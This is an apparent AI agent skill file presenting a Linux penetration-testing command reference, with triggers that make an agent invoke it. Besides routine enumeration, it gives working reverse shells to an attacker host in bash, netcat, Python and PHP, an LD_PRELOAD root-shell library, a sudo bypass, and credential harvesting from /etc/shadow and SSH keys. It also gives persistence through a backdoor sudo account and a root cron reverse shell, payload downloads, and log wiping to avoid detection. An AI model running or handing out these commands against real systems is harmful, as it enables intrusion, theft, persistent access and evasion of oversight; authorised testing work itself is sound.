linux-pentester-commands - SKILL.md Agent Skill

name: linux-pentester-commands description: Practical Linux command reference for penetration testing, reconnaissance, enumeration, exploitation, and privilege escalation triggers: - how do I enumerate services on a Linux system - show me Linux commands for privilege escalation - what are the best reconnaissance commands for pentesting - help me with Linux exploitation techniques - how to perform local enumeration on Linux - give me pentesting cheatsheet commands - what Linux commands should I use during post-exploitation - show me how to escalate privileges on Linux

Linux Pentester Commands Skill

Skill by ara.so — Security Skills collection.

This skill provides expertise in using the Linux for a Pentester command reference repository, a curated collection of practical Linux commands used in penetration testing workflows including reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation.

What This Project Does

Linux for a Pentester is a practical command reference organized by penetration testing phases:

General Commands: Essential Linux survival commands
Reconnaissance: Local and network information gathering
Enumeration: Deep service and user data discovery
Exploitation: Initial access techniques
Privilege Escalation: Techniques to gain root access
Post-Exploitation: Persistence and lateral movement
Cheatsheets: Quick reference one-liners

Installation

Clone the repository to have offline access during engagements:

git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
cd Linux-for-a-Pentester

For quick reference during active testing:

# Add as a shell alias for fast access
echo 'alias pentref="cd ~/Linux-for-a-Pentester && ls"' >> ~/.bashrc
source ~/.bashrc

Repository Structure

Linux-for-a-Pentester/
├── 00-General-Commands/       # Basic Linux survival commands
├── 01-Recon/                  # Reconnaissance phase commands
├── 02-Enumeration/            # Service and system enumeration
├── 03-Exploitation/           # Exploitation techniques
├── 04-Privilege-Escalation/   # Privilege escalation methods
├── 05-Post-Exploitation/      # Post-exploitation activities
└── Cheatsheets/               # Quick reference sheets

Common Pentesting Workflows

1. Initial Reconnaissance

System Information Gathering:

# Basic system information
uname -a                    # Kernel version and architecture
cat /etc/os-release        # OS version details
hostname                    # Current hostname
uptime                      # System uptime

# User context
whoami                      # Current user
id                         # User/group IDs and memberships
groups                      # Group memberships

Network Reconnaissance:

# Network interfaces and connections
ip addr                     # Network interfaces
ip route                    # Routing table
ss -tulpn                   # Active network connections
netstat -antup              # Alternative (older systems)

# DNS and hostname resolution
cat /etc/hosts
cat /etc/resolv.conf

2. Enumeration Phase

User Enumeration:

# User and group information
cat /etc/passwd             # All users
cat /etc/group              # All groups
lastlog                     # Last login information
w                          # Currently logged-in users

# Home directories
ls -la /home/
find /home -type f -readable 2>/dev/null

Service Enumeration:

# Running services
systemctl list-units --type=service --state=running
ps aux                      # All running processes
ps -ef --forest            # Process tree view

# Listening services
ss -tulpn | grep LISTEN
lsof -i -P -n              # Open network connections

File System Enumeration:

# SUID/SGID files (privilege escalation vectors)
find / -perm -4000 -type f 2>/dev/null        # SUID files
find / -perm -2000 -type f 2>/dev/null        # SGID files
find / -perm -6000 -type f 2>/dev/null        # Both

# Writable directories
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null

# Configuration files
find /etc -type f -readable 2>/dev/null
grep -r "password" /etc/ 2>/dev/null

3. Exploitation Commands

Reverse Shells:

# Bash reverse shell
bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1

# Netcat reverse shell
nc -e /bin/bash $ATTACKER_IP 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_IP 4444 >/tmp/f

# Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ATTACKER_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# PHP reverse shell
php -r '$sock=fsockopen("$ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Shell Upgrade:

# Upgrade to interactive TTY
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Full interactive shell
# In reverse shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl+Z to background
# On attacker machine:
stty raw -echo; fg
# Press Enter twice
export TERM=xterm

4. Privilege Escalation

SUID Exploitation:

# Find SUID binaries
find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null

# Common SUID exploits
# GTFOBins patterns for specific binaries
/usr/bin/find . -exec /bin/sh \; -quit
/usr/bin/vim -c ':!/bin/sh'
/usr/bin/nmap --interactive

Sudo Exploitation:

# Check sudo privileges
sudo -l

# Common sudo bypasses
sudo -u#-1 /bin/bash          # CVE-2019-14287 (sudo < 1.8.28)

# LD_PRELOAD exploitation (if env_keep+=LD_PRELOAD)
# Create malicious library
cat > /tmp/shell.c << EOF
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
EOF
gcc -fPIC -shared -o /tmp/shell.so /tmp/shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so <allowed_program>

Cron Job Exploitation:

# Enumerate cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
crontab -l -u root 2>/dev/null

# Check for writable cron scripts
find /etc/cron* -type f -writable 2>/dev/null

Kernel Exploits:

# Check kernel version
uname -a
cat /proc/version

# Search for kernel exploits (use searchsploit or online databases)
# Common kernel exploits:
# - DirtyCow (CVE-2016-5195)
# - DirtyPipe (CVE-2022-0847)

5. Post-Exploitation

Credential Harvesting:

# SSH keys
find / -name id_rsa 2>/dev/null
find / -name authorized_keys 2>/dev/null

# Password files and history
cat /etc/shadow 2>/dev/null
cat ~/.bash_history
find / -name .bash_history 2>/dev/null

# Configuration files with credentials
grep -r "password" /var/www/ 2>/dev/null
grep -r "pass" /opt/ 2>/dev/null
find / -name "*.conf" -exec grep -i "password" {} \; 2>/dev/null

Persistence:

# Add SSH key
mkdir -p ~/.ssh
echo "$PUBLIC_KEY" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

# Add user account
useradd -m -s /bin/bash backdoor
echo "backdoor:password" | chpasswd
usermod -aG sudo backdoor

# Cron persistence
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'" >> /var/spool/cron/crontabs/root

Key Command Categories

Network Scanning

# Port scanning (if nmap unavailable, use native tools)
for port in {1..1000}; do timeout 1 bash -c "echo >/dev/tcp/localhost/$port" 2>/dev/null && echo "Port $port open"; done

# ARP scanning
ip neigh
arp -a

File Transfer Techniques

# Python HTTP server (attacker machine)
python3 -m http.server 8000

# Download files (target machine)
wget http://$ATTACKER_IP:8000/file
curl -O http://$ATTACKER_IP:8000/file

# If no wget/curl
exec 3<>/dev/tcp/$ATTACKER_IP/8000
echo -e "GET /file HTTP/1.0\r\n\r\n" >&3
cat <&3 > file

# Base64 transfer (small files)
# On attacker: base64 file | xclip -selection clipboard
# On target: echo "BASE64_STRING" | base64 -d > file

Log Cleanup

# Clear bash history
history -c
rm ~/.bash_history
unset HISTFILE

# Clear system logs (requires root)
echo "" > /var/log/auth.log
echo "" > /var/log/syslog
find /var/log -type f -exec truncate -s 0 {} \;

Environment Variables

When working with this reference, consider setting these environment variables in your testing environment:

# Set in ~/.bashrc or testing session
export ATTACKER_IP="10.10.14.x"  # Your attack machine IP
export TARGET_IP="10.10.10.x"     # Target machine IP
export LPORT=4444                  # Default listening port

Troubleshooting Common Issues

Command Not Found

Some commands may not be available on minimal systems:

# netstat unavailable → use ss
ss -tulpn

# ifconfig unavailable → use ip
ip addr

# wget unavailable → use curl
curl -O http://example.com/file

# nc without -e flag → use named pipe method
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_IP 4444 >/tmp/f

Permission Denied Errors

# Redirect stderr to avoid noise
find / -name "interesting" 2>/dev/null

# Use accessible directories
cd /tmp || cd /dev/shm

Limited Shell Issues

# Spawn TTY
python -c 'import pty; pty.spawn("/bin/bash")'
script /dev/null -c bash
/bin/bash -i

Best Practices

Always redirect errors when searching: 2>/dev/null
Use /tmp or /dev/shm for temporary files (usually writable)
Clean up after testing to avoid detection
Document findings as you discover them
Test commands in safe environments first
Keep GTFOBins bookmarked for SUID/sudo exploitation
Check LinPEAS/LinEnum output systematically

Integration with Testing Workflow

# Typical engagement flow:
# 1. Gain initial access
# 2. Stabilize shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

# 3. Quick wins check
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/crontab

# 4. Deep enumeration
# Run automated scripts or manual enumeration

# 5. Exploit findings
# Based on discovered vectors

# 6. Post-exploitation
# Gather credentials, maintain access

# 7. Cleanup
history -c && rm ~/.bash_history

This skill provides the command reference needed for practical Linux penetration testing. Refer to the repository's individual directories for more detailed notes on each phase.